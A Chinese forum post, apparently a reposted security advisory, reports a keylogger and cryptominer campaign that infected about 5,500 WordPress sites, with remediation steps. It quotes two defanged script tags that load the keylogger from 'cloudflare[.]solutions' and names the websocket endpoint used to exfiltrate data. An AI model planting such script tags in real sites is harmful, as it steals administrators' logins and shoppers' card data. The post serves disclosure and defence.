5500 个 WordPress 网站发现按键记录器

[复制链接]
admin 发表于 2017-12-13 10:00:11 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
     据最新消息,约有5500 个 WordPress 网站被发现感染了一个记录键盘点击的恶意脚本,有时候还会加载运行在浏览器上的挖矿程序。

此恶意脚本加载自域名 “cloudflare.solutions”,但该域名与云计算服务商 Cloudflare 无关,只要用户从输入字段切换,就会记录用户在表单字段中输入的内容。
该脚本同时加载到网站的前端和后端,这就意味着它能用于窃取管理员登录凭证和 WP 电子商务网站的信用卡数据。
201712098394_229.jpg
根据网站源代码搜索引擎 PublicWWW,有 5496 个 WordPress 网站运行了该按键记录程序,而且攻击者从四月份就开始了。
已知加载键盘记录的两个恶意脚本:
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >
被盗数据被发送到 wss://cloudflare[.]solutions:8085端口。
如恶意代码驻留在function.php文件中,你应该删除add_js_scripts函数和所有提到add_js_scripts的add_action语句。考虑到这个恶意软件的键盘记录功能,你应该考虑所有的WordPress密码都被破坏了,所以下一个步骤是修改密码,此外别忘了检查你的网站是否有其他感染。
     
     
温馨提示:资源转载网络,如有侵权或下载链接失效或密码不对请联系站长

1、在论坛里发表的文章仅代表作者本人的观点,与本网站立场无关。
2、论坛的所有内容都不保证其准确性,有效性,时间性。阅读本站内容因误导等因素而造成的损失本站不承担连带责任。
3、当政府机关依照法定程序要求披露信息时,论坛均得免责。
4、若因线路及非本站所能控制范围的故障导致暂停服务期间造成的一切不便与损失,论坛不负任何责任。
5、注册会员通过任何手段和方法针对论坛进行破坏,我们有权对其行为作出处理。并保留进一步追究其责任的权利。
回复

使用道具 举报

*滑块验证:
高级模式
B Color Image Link Quote Code Smilies

本版积分规则

专注源码资源免费分享
只要有下载币全站均可下

承诺不强制购买vip

周一至周日9:00-23:00

反馈建议

282865654@qq.com 在线QQ咨询

赞助我们享尊贵分享

Powered by X3.3© 2019-2029 3se.cc Inc.( 京ICP备14050279号-2